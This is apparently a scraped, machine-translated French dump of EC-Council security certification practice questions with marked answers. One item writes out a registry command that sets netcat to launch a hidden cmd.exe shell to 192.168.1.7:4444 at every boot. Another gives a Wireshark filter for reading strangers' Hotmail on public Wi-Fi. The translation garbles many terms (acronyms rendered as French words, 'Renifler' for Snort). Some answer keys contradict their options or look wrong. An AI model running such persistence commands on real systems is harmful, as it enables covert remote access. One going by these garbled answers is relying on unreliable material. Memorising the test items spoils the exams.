EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 16


Lequel des éléments suivants est un protocole de couche session?

Les options sont:

SLP

ICMP

RDP

RPC (correct)

Réponse: RPC
Lequel des éléments suivants est un protocole de couche de présentation?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 8/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Les options sont:

TCP

RPC

BGP

LWAPP (correct)

Réponse: LWAPP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 9/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

ECCouncil 312-38 Administrateur de la sécurité des réseaux


(ENSA), ensemble d'examens 6
Les adresses IP réservées à la multidiffusion appartiennent à laquelle des classes suivantes?

Les options sont:

Classe C

Classe B

Classe D (correct)

Classe E

Réponse: Classe D

EC0-232 EC-Council E-Commerce Architect Practice Practice Set 7


Laquelle des normes IEEE suivantes fonctionne sur une bande passante de 2,4 GHz et
transfère des données à un débit de 54 Mbps?

Les options sont:

802.11n

802.11g (correct)

802.11r

802.11a

Réponse: 802.11g

Lequel des éléments suivants est un protocole IPSec qui peut être utilisé seul en combinaison
avec Authentication Header (AH)?

Les options sont:

ESP (correct)

L2TP

PPTP

PPP

Réponse: ESP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 1/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Lequel des câbles UTP suivants prend en charge la transmission jusqu'à 20 MHz?

Les options sont:

Catégorie 4

Catégorie 5e

Catégorie 1

Catégorie 2 (correct)

Réponse: Catégorie 2

ECCouncil 712-50 CISO Certified (CISIS) Practice Exam Set 5


Lequel des éléments suivants est un dispositif de sécurité physique conçu pour piéger une
personne exprès?

Les options sont:

Mantrap (correct)

Vol de guerre

Craie de guerre

Piège

Réponse: Mantrap
Laquelle des adresses IP suivantes est l'adresse de bouclage dans IPv6?

Les options sont:

0: 0: 0: 1: 1: 0: 0: 0

1: 0: 0: 0: 0: 0: 0: 0

0: 0: 0: 0: 0: 0: 0: 1 (correct)

0: 0: 0: 0: 0: 0: 0: 0

Réponse: 0: 0: 0: 0: 0: 0: 0: 1

Laquelle des normes IEEE suivantes fournit des spécifications pour les systèmes ATM sans
fil?

Les options sont:

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 2/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

802.3

802,5

802.1

802.11a (correct)

Réponse: 802.11a

ECCouncil 312-50 Certifié Ethical Hacker Certified Exam Set 8


Lequel des éléments suivants est un réseau informatique qui couvre une large zone?

Les options sont:

POUVEZ

LA POÊLE

SAN

WAN (correct)

Réponse: WAN

Lesquels des éléments suivants sont fournis par des signatures numériques?

Les options sont:

Intégrité et validation

Authentification et identification (correct)

Sécurité et intégrité

Identification et validation

Réponse: authentification et identification

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe C?

Les options sont:

192-223 (correct)

128-191

0-127

224-255

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 3/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Réponse: 192-223

ECCouncil ECSS Certified Security Specialist Practice Exam Set 3


Dans lequel des modes de transmission suivants la communication est-elle bidirectionnelle?

Les options sont:

Mode simplex

Mode duplex intégral (correct)

Mode semi-duplex

Mode racine

Réponse: mode duplex intégral

Lequel des éléments suivants est un point de réseau qui sert d’entrée à un autre réseau?

Les options sont:

Passerelle (correcte)

Centre

Pont

Destinataire

Réponse: passerelle

Lequel des outils suivants est utilisé pour la détection des réseaux locaux sans fil?

Les options sont:

fort Knox

NetStumbler (correct)

Airopeek

Renifleur

Réponse: NetStumbler

EC0-232 EC-Council Exam E-Commerce Architect Set 3


Laquelle des couches suivantes effectue le routage des datagrammes IP?

Les options sont:

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 4/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Couche de lien

Couche d'application

Couche Internet (correcte)

Couche de transport

Réponse: couche Internet

Lequel des éléments suivants est un type d'escroquerie qui incite un utilisateur à divulguer des
informations personnelles?

Les options sont:

Schtroumpf

Reniflement

Phishing (correct)

Spamming

Réponse: Phishing

Lesquels des pare-feu suivants sont utilisés pour suivre l'état des connexions actives et
déterminer les paquets réseau autorisés à entrer via le pare-feu? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Passerelle au niveau du circuit

Avec état (correct)

Serveur proxy

Filtrage dynamique des paquets (correct)

Réponse: filtrage dynamique des paquets dynamique

ECCouncil 312-49 Computer Hacking Forensic Investigator Exam Set 5


Lequel des champs suivants de l'en-tête IPv6 est décrémenté de 1 pour chaque routeur qui
transfère le paquet?

Les options sont:

En-tête suivant

Classe de trafic
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 5/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Étiquette de flux

Limite de saut (correcte)

Réponse: limite de saut

Lequel des plans de récupération suivants comprend des stratégies et des actions spécifiques
pour faire face à des écarts spécifiques aux hypothèses entraînant un problème de sécurité,
une urgence ou une situation particulière?

Les options sont:

Plan d'urgence (correct)

Plan de reprise après sinistre

Plan de continuité des opérations

Plan de continuité des activités

Réponse: Plan d'urgence

Vous travaillez en tant qu'administrateur réseau pour uCertify Inc. La société a prévu
d'ajouter la prise en charge de l'adressage IPv6. Le déploiement de la phase initiale d'IPv6
nécessite la prise en charge de certains périphériques IPv6 uniquement. Ces appareils doivent
accéder à des serveurs qui prennent uniquement en charge IPv4. Lequel des outils suivants
conviendrait-il d'utiliser?

Les options sont:

IPv6 natif

Tunnels point à point

Tunnels multipoints

NAT-PT (correct)

Réponse: NAT-PT

EC0-479 EC-Council Certified Security Analyst Practice Exam Set 6


Lesquelles des responsabilités suivantes incombent à l'équipe de reprise après sinistre?
Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Pour surveiller l'exécution du plan de reprise après sinistre et évaluer les résultats (Correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 6/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Pour modifier et mettre à jour le plan de reprise après sinistre en fonction des leçons tirées des efforts
de reprise après sinistre précédents (Correct)

Pour informer la direction, le personnel concerné et les tiers de la catastrophe D.Initier l'exécution des
procédures de reprise après sinistre (Correct)

Réponse: Pour surveiller l'exécution du plan de reprise après sinistre et évaluer les résultats
Pour modifier et mettre à jour le plan de reprise après sinistre en fonction des leçons tirées des efforts
antérieurs de reprise après sinistre Pour informer la direction, le personnel affecté et les tiers de la
catastrophe D.Initier l'exécution des procédures de reprise après sinistre

Lequel des systèmes suivants est formé par un groupe de pots de miel?

Les options sont:

Honeyfarm

Pot de miel de recherche

Pot de miel de production

Honeynet (correct)

Réponse: Honeynet

Laquelle des mesures de routage suivantes fait référence à la durée nécessaire pour déplacer
un paquet de la source à la destination via l'interréseau?

Les options sont:

Bande passante

Charge

Retard de routage (correct)

Longueur du trajet

Réponse: retard de routage

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 7


Laquelle des options suivantes est l'une des implémentations de RAID les plus utilisées?

Les options sont:

RAID 3

RAID 5 (correct)

RAID 2

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 7/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

RAID 1

Réponse: RAID 5

Lequel des éléments suivants peut être effectué avec des périphériques logiciels ou matériels
afin d'enregistrer tout ce qu'une personne tape à l'aide de son clavier?

Les options sont:

Numérotation de guerre

IRC bot

Enregistrement des frappes (correct)

Warchalking

Réponse: enregistrement des frappes

Lequel des éléments suivants est un processus de gestion qui fournit un cadre pour
promouvoir une récupération rapide et la capacité d'une réponse efficace pour protéger les
intérêts de sa marque, de sa réputation et de ses parties prenantes?

Les options sont:

Gestion des correctifs

Gestion de la continuité des activités (correcte)

Traitement des incidents

Analyse du journal

Réponse: Gestion de la continuité des opérations

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 8


Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?

Les options sont:

RG-62

RG-8

RG-58

RG-59 (correct)

Réponse: RG-59
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 8/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Lequel des éléments suivants examine le trafic réseau pour identifier les menaces qui génèrent
des flux de trafic inhabituels, telles que les attaques par déni de service distribué (DDoS),
certaines formes de logiciels malveillants et les violations de stratégie?

Les options sont:

Prévention d'intrusion basée sur le réseau

Analyse du comportement du réseau (correct)

Prévention des intrusions basée sur l'hôte

Système de prévention des intrusions sans fil

Réponse: Analyse du comportement du réseau

Lequel des processus suivants aide les unités opérationnelles à comprendre l'impact d'un
événement perturbateur?

Les options sont:

Évaluation de l'impact sur les entreprises (correct)

Approbation et mise en œuvre du plan

Élaboration d'un plan de continuité des activités

Portée et lancement du plan

Réponse: évaluation de l'impact sur les entreprises

Lequel des outils suivants est un système open source de prévention et de détection des
intrusions sur le réseau qui fonctionne comme un renifleur de réseau et enregistre les activités
du réseau qui correspondent aux signatures prédéfinies?

Les options sont:

Renifler (correct)

Dsniff

Kismet

KisMAC

Réponse: Snort

Dans laquelle des attaques suivantes un attaquant utilise-t-il un logiciel qui essaie un grand
nombre de combinaisons de touches afin d'obtenir un mot de passe?
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 9/10
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA), ensemble d'examens 6

Les options sont:

Attaque de Schtroumpf

Débordement de tampon

Attaque par force brute (Correct)

Attaque Zero Day

Réponse: Attaque par force brute

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 10/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité


de réseau (ENSA) 7
Vous exécutez la commande suivante sur l'ordinateur Windows Server 2003 distant: c: \ reg add HKLM \
Software \ Microsoft \ Windows \ CurrentVersion \ Run / v nc / t REG_SZ / d "c: \ windows \ nc.exe -d
192.168. 1.7 4444 -e cmd.exe "Quelle tâche souhaitez-vous exécuter en exécutant cette commande? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Vous souhaitez mettre Netcat en mode furtif. (Correct)

Vous souhaitez effectuer une saisie de bannière.

Vous souhaitez ajouter la commande Netcat au registre Windows. (Correct)

Vous souhaitez définir le Netcat pour exécuter la commande à tout moment. (Correct)

Réponse: Vous souhaitez mettre Netcat en mode furtif. Vous souhaitez ajouter la commande Netcat au registre
Windows. Vous souhaitez définir le Netcat pour exécuter la commande à tout moment.

EC0-232 EC-Council E-Commerce Architect Exam Set 12


Lequel des éléments suivants est un appareil qui assure la communication locale entre l'enregistreur de
données et un ordinateur?

Les options sont:

Modem optique

Modem acoustique

Modem courte distance (correct)

Modem sans contrôleur

Réponse: modem courte distance

Quelle est la position du pot de miel sur un réseau?

Les options sont:

Honeyfarm

Centre

DMZ (correct)

Honeynet

Réponse: DMZ

Lesquels des éléments suivants sont utilisés comme technique d'estimation des coûts pendant la phase de
planification du projet? Chaque bonne réponse représente une solution complète. Choisissez trois.

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Les options sont:

Jugement d'expert (correct)

Technique d'examen des évaluations de programme (PERT)

Technique Delphi (Correct)

Analyse des points de fonction (correct)

Réponse: Jugement expert Technique Delphi Analyse des points de fonction

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1


Parmi les affirmations suivantes, lesquelles ne sont PAS vraies concernant le système de fichiers FAT16?
Chaque réponse correcte représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Il ne prend pas en charge la sécurité au niveau des fichiers. (Correct)

Il prend en charge le système d'exploitation Linux.

Il fonctionne bien avec les grands disques car la taille du cluster augmente à mesure que la taille de la partition de
disque augmente.

Il prend en charge la compression au niveau des fichiers. (Correct)

Réponse: il ne prend pas en charge la sécurité au niveau des fichiers. Il prend en charge la compression au
niveau des fichiers.

Lequel des pots de miel suivants est une petite alarme antivol utile?

Les options sont:

Honeyd

Honeynet

Compatible avec les backofficers (correct)

Spectre

Réponse: Backofficer friendly

Lequel des outils suivants est un outil gratuit de suivi des ordinateurs portables qui permet de suivre
l'ordinateur portable d'un utilisateur en cas de vol?

Les options sont:

Renifler

Nessus

Adeona (correct)

SAINT

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 2/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Réponse: Adeona

ECCouncil 312-76Disaster Recover Professional Practice Exam Set 8


Lequel des éléments suivants est un outil d'audit de sécurité gratuit pour Linux?

Les options sont:

HPing

SAINT

SATAN

Nessus (correct)

Réponse: Nessus
Lequel des éléments suivants est un protocole standard qui offre le plus haut niveau de sécurité VPN?

Les options sont:

L2TP

PPP

IP

IPSec (correct)

Réponse: IPSec

Lequel des outils suivants analyse les systèmes de réseau à la recherche de vulnérabilités connues et souvent
exploitées?

Les options sont:

SATAN (correct)

Nessus

HPing

SAINT

Réponse: SATAN

ECCouncil ECSS Certified Security Specialist Practice Exam Set 8


Lequel des éléments suivants est un type de sécurité informatique qui traite de la protection contre les
signaux parasites émis par les équipements électriques du système?

Les options sont:

Sécurité physique

Sécurité d'émanation (correcte)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 3/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Sécurité des communications

Sécurité du matériel

Réponse: Emanation Security

Lequel des types de cyberharcèlement suivants nuit à la réputation de leur victime et retourne d'autres
personnes contre eux en créant leurs propres sites Web, blogs ou pages utilisateur à cet effet?

Les options sont:

Fausse victimisation

Fausse accusation (correcte)

Encourager les autres à harceler la victime

Tentatives de recueillir des informations sur la victime

Réponse: Fausse accusation

Lesquelles des adresses de classe IP suivantes ne sont pas attribuées aux hôtes? Chaque réponse correcte
représente une solution complète. Choisissez tout ce qui correspond

Les options sont:

Classe A

Classe B

Classe E (correcte)

Classe D (correct)

Réponse: Classe E Classe D

312-50V8 Ethical Hacker V8 Certification Practice Test Set 17


Lesquelles des affirmations suivantes sont vraies concernant la mémoire volatile? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations stockées. (Correct)

Le contenu est stocké en permanence et même l'alimentation est coupée.

La mémoire morte (ROM) est un exemple de mémoire volatile.

Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données. (Correct)

Réponse: C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées. Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données.

Parmi les périphériques réseau suivants, lesquels fonctionnent sur la couche réseau du modèle
OSI? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 4/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Les options sont:

Répétiteur

Routeur (correct)

Pont

Passerelle (correcte)

Réponse: Router Gateway

Laquelle des couches OSI suivantes établit, gère et met fin aux connexions entre les applications locales et
distantes?

Les options sont:

Couche de session (correcte)

Couche d'application

Couche réseau

Couche de liaison de données

Réponse: couche de session

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 3


Lequel des types de RAID suivants n'offre aucune protection pour le disque de parité?

Les options sont:

RAID 3 (correct)

RAID 5

RAID 2

RAID 1

Réponse: RAID 3

Lequel des éléments suivants est une implémentation open source du protocole syslog pour Unix?

Les options sont:

syslog-ng (correct)

Unix-syslog

syslog Unix

syslog-os

Réponse: syslog-ng
Laquelle des organisations suivantes est responsable de la gestion de l'attribution des noms de domaine et
des adresses IP?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Les options sont:

ANSI

ICANN (correct)

W3C

ISO

Réponse: ICANN

ECCouncil EC0-349 Hack informatique Forensic Investigator Exam Set 5

Lequel des protocoles suivants est une version plus sécurisée du protocole PPTP (Point-to-Point Tunneling
Protocol) et assure la tunnellisation, l'attribution d'adresses et l'authentification?

Les options sont:

DHCP

PPP

IP

L2TP (correct)

Réponse: L2TP

La sécurité du réseau est le domaine spécialisé, qui comprend les dispositions et politiques adoptées par
l'administrateur réseau pour empêcher et surveiller l'accès non autorisé, l'utilisation abusive, la
modification ou le refus du réseau informatique et des ressources accessibles par le réseau. Pour laquelle des
raisons suivantes la sécurité du réseau est-elle nécessaire? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond

Les options sont:

Pour protéger les informations contre la perte et les livrer correctement à destination (Correct)

Pour protéger les informations contre les modifications indésirables, accidentelles ou intentionnelles par des utilisateurs
non autorisés (Correct)

Pour protéger les informations privées sur Internet (Correct)

Pour empêcher un utilisateur d'envoyer un message à un autre utilisateur avec le nom d'une troisième personne
(Correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 6/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Réponse: Pour protéger les informations contre la perte et les livrer correctement à leur destination Pour
protéger les informations contre les modifications indésirables, accidentelles ou intentionnelles par des utilisateurs non
autorisés Pour protéger les informations privées sur Internet Pour empêcher un utilisateur d'envoyer un message à un
autre utilisateur avec le nom d'un à la troisième personne

Adam, un pirate malveillant, renifle un réseau Wi-Fi non protégé situé dans un magasin local avec
Wireshark pour capturer le trafic de messagerie Hotmail. Il sait que de nombreuses personnes utilisent leur
ordinateur portable pour naviguer sur le Web dans le magasin. Adam veut renifler leurs e-mails traversant
le réseau Wi-Fi non protégé. Lequel des filtres Wireshark suivants Adam configurera-t-il pour afficher
uniquement les paquets contenant des messages électroniques hotmail?

Les options sont:

(http = "login.passport.com") && (http contient "POP3")

(http contient "email") && (http contient "hotmail")

(http = "login.pass.com") && (http contient "SMTP")

(http contient "hotmail") && (http contient "Reply-To") (Correct)

Réponse: (http contient "hotmail") && (http contient "Reply-To")

EC0-232 EC-Council ec0-232 Examen d'architecte de commerce électronique, ensemble 2


Qu'est-ce que c'est?

Les options sont:

Un virus

Un IDS réactif.

Un pot de miel (correct)

Un virus polymorphe

Réponse: un pot de miel

Lequel des énoncés suivants est un processus de transformation où l'ancien système ne peut plus être
maintenu?

Les options sont:

Risque

Menace

Catastrophe

Crise (correcte)

Réponse: crise

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 7/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?

Les options sont:

Parallèle

En série

Crossover (correct)

Loopback

Réponse: Crossover

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 1


Lesquels des protocoles de routage à vecteur de distance sont les suivants? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

IS-IS

IGRP (correct)

RIP (correct)

OSPF

Réponse: IGRP RIP


Lequel des éléments suivants est un outil Unix et Windows capable d'intercepter le trafic sur un segment de
réseau et de capturer le nom d'utilisateur et le mot de passe?

Les options sont:

Aircrack

Ettercap (correct)

AirSnort

BackTrack

Réponse: Ettercap

Adam, un pirate malveillant, vient de réussir à voler un cookie sécurisé via une attaque XSS. Il est capable
de rejouer le cookie même lorsque la session est valide sur le serveur. Laquelle des raisons suivantes est la
raison la plus probable de cette cause?

Les options sont:

Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique). (Correct)

Un cryptage bidirectionnel est appliqué.


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 8/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Aucun cryptage n'est appliqué.

Le chiffrement est effectué au niveau de la couche réseau (chiffrement de couche 1).

Réponse: Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique).

ECCouncil 312-49v8 Computer Hacking Investigator Exam Set 6

Lequel des ensembles de pratiques de réponse aux incidents suivants est recommandé par le CERT / CC?

Les options sont:

Préparer, gérer et notifier

Préparer, notifier et assurer le suivi

Informer, gérer et assurer le suivi

Préparer, gérer et assurer le suivi (correct)

Réponse: préparer, gérer et assurer le suivi


Lequel des éléments suivants est une collection centralisée de pots de miel et d'outils d'analyse?

Les options sont:

Honeyfarm (correct)

Honeynet

Pot de miel de recherche

Pot de miel de production

Réponse: Honeyfarm

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-7 9/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA)


Set d'examen 8
Laquelle des phases suivantes est la première étape vers la création d'un plan de continuité des activités?

Les options sont:

Élaboration d'un plan de continuité des activités

Évaluation de l'impact sur les entreprises

Étendue et lancement du plan (correct)

Approbation et mise en œuvre du plan

Réponse: portée et lancement du plan

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 7


Laquelle des organisations suivantes est une organisation à but non lucratif qui supervise l'allocation des
adresses IP, la gestion de l'infrastructure DNS, l'attribution des paramètres de protocole et la gestion du
système du serveur racine?

Les options sont:

ICANN (correct)

IEEE

ANSI

UIT

Réponse: ICANN

Laquelle des politiques suivantes aide à définir ce que les utilisateurs peuvent et doivent faire pour utiliser
l'équipement informatique du réseau et de l'organisation?

Les options sont:

Politique d'accès à distance

Politique informatique

Politique d'utilisation (correcte)

Politique générale

Réponse: politique de l'utilisateur

Lequel des types de transmission suivants consiste à envoyer un bit à la fois sur une seule ligne de
transmission?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 1/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Les options sont:

Transmission de données en série (correct)

Transmission multidiffusion

Transmission unicast

Transmission de données parallèle

Réponse: transmission de données en série

ECCouncil 712-50 Ensemble d'examens de pratique certifiés CISO (CCISO) 11


Laquelle des normes suivantes est une modification de l'IEEE 802.11 d'origine et spécifie les mécanismes de
sécurité pour les réseaux sans fil?

Les options sont:

802.11b

802.11e

802.11a

802.11i (correct)

Réponse: 802.11i
Lequel des éléments suivants est un appareil de la taille d'une carte de crédit utilisé pour stocker en toute
sécurité des informations personnelles et utilisé conjointement avec un code PIN pour authentifier les
utilisateurs?

Les options sont:

Carte Java

Carte de proximité

Carte à puce (correcte)

carte SD

Réponse: carte à puce

Lequel des plans suivants est documenté et organisé pour les interventions d'urgence, les opérations de
sauvegarde et la restauration maintenues par une activité dans le cadre de son programme de sécurité qui
garantira la disponibilité des ressources critiques et facilitera la continuité des opérations dans une situation
d'urgence?

Les options sont:

Plan de reprise après sinistre

Plan de continuité des activités

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 2/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8
Plan de continuité des opérations

Plan d'urgence (correct)

Réponse: Plan d'urgence

ECCouncil EC0-349 Hack forensic Investigator Exam Set 9


Parmi les représentants suivants du processus de réponse aux incidents, lesquels sont inclus dans l'équipe de
réponse aux incidents? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui
correspond.

Les options sont:

Représentant légal (correct)

Représentant en sécurité de l'information (correct)

Représentant technique (correct)

Ressources humaines (correct)

Enquêteur principal (correct)

Réponse: Représentant légal Représentant en sécurité de l'information Représentant technique Ressources


humaines Enquêteur principal

Lequel des éléments suivants est un outil d'analyse de réseau qui envoie des paquets avec des paramètres de
pile IP non traditionnels?

Les options sont:

SAINT

Nessus

COPS

HPing (correct)

Réponse: HPing

Avec laquelle des formes suivantes d'accusé de réception l'expéditeur peut-il être informé par le destinataire
des données de tous les segments qui ont réussi?

Les options sont:

Accusé de réception sélectif (correct)

Remerciements cumulatifs

Accusé de réception négatif

Accusé de réception de blocage

Réponse: reconnaissance sélective

ECCouncil ECSS Certified Security Specialist Practice Exam Set 9

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 3/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Lesquels des éléments suivants fournissent un service d'accès Internet «toujours activé» lors de la connexion
à un FAI? Chaque bonne réponse représente une solution complète. Choisissez deux.

Les options sont:

Modem numérique

Modem câble (correct)

Modem analogique

DSL (correct)

Réponse: modem câble DSL

Lequel des types de RAID suivants est également connu sous le nom de répartition par disque?

Les options sont:

RAID 0 (correct)

RAID 3

RAID 2

RAID 1

Réponse: RAID 0

Avec lequel des ensembles d'indicateurs suivants le scan d'arbre de Noël envoie-t-il une trame TCP à un
périphérique distant? Chaque bonne réponse représente une partie de la solution. Choisissez tout ce qui
correspond.

Les options sont:

RST

FIN (correct)

PUSH (correct)

URG (correct)

Réponse: FIN PUSH URG

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 7

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 4/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Laquelle des fonctionnalités clés suivantes est utilisée par TCP afin de réguler la quantité de données
envoyées par un hôte à un autre hôte du réseau?

Les options sont:

Contrôle de la congestion

Contrôle de flux (correct)

Numéro de séquence

Horodatage TCP

Réponse: Contrôle de flux

Laquelle des métriques de routage suivantes représente la somme des coûts associés à chaque lien traversé?

Les options sont:

Coût de communication

Bande passante

Retard d'acheminement

Longueur du chemin (correct)

Réponse: Longueur du chemin

Laquelle des couches suivantes du modèle TCP / IP est utilisée pour déplacer des paquets entre les
interfaces de la couche Internet de deux hôtes différents sur la même liaison?

Les options sont:

Couche de transport

Couche d'application

Couche Internet

Couche de lien (correcte)

Réponse: couche de liaison

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 9


Lequel des éléments suivants est une attaque contre un site Web qui modifie l'apparence visuelle du site et
porte gravement atteinte à la confiance et à la réputation du site Web?

Les options sont:

Dégradation du site Web (correct)

Attaque Zero Day

Débordement de tampon

Usurpation d'identité
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 5/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Réponse: Dégradation de site Web

Vous êtes administrateur d'un réseau dans une banque d'investissement. Vous êtes préoccupé par le fait que
des individus violent votre réseau et puissent voler des données avant de pouvoir détecter leur présence et
fermer leur accès. Lequel des éléments suivants est le meilleur moyen de résoudre ce problème?

Les options sont:

Mettez en place un pot de miel. (Correct)

Implémentez un antivirus basé sur le réseau.

Mettez en place un pare-feu solide.

Mettez en œuvre une politique de mot de passe solide.

Réponse: Mettez en place un pot de miel.

Peter, un pirate malveillant, obtient des adresses électroniques en les récupérant à partir de publications, de
blogs, de listes DNS et de pages Web. Il envoie ensuite un grand nombre de messages électroniques
commerciaux non sollicités (UCE) à ces adresses. Lequel des crimes par courrier électronique suivants est-il
en train de commettre?

Les options sont:

Tempête d'e-mails

Usurpation d'identité par e-mail

Spam par e-mail (correct)

Bombardement par e-mail

Réponse: Spam par e-mail

EC0-349 Jeu d'examen informatique de piratage informatique 9


Lequel des champs d'en-tête suivants dans les protocoles TCP / IP implique une attaque Ping of Death?

Les options sont:

Champ d'en-tête IP

Champ d'en-tête TCP (correct)

Champ d'en-tête SMTP

Champ d'en-tête UDP

Réponse: champ d'en-tête TCP


Laquelle des politiques suivantes est un ensemble de règles conçues pour améliorer la sécurité informatique
en encourageant les utilisateurs à utiliser des mots de passe forts et à les utiliser correctement?

Les options sont:

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 6/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8
Politique de protection des informations

Stratégie de groupe

Politique d'accès à distance

Politique de mot de passe (correcte)

Réponse: politique de mot de passe

Lequel des énoncés suivants fait référence à l'exploitation d'une session informatique valide pour obtenir un
accès non autorisé à des informations ou des services dans un système informatique?

Les options sont:

Hameçonnage

Usurpation d'identité

Schtroumpf

Détournement de session (correct)

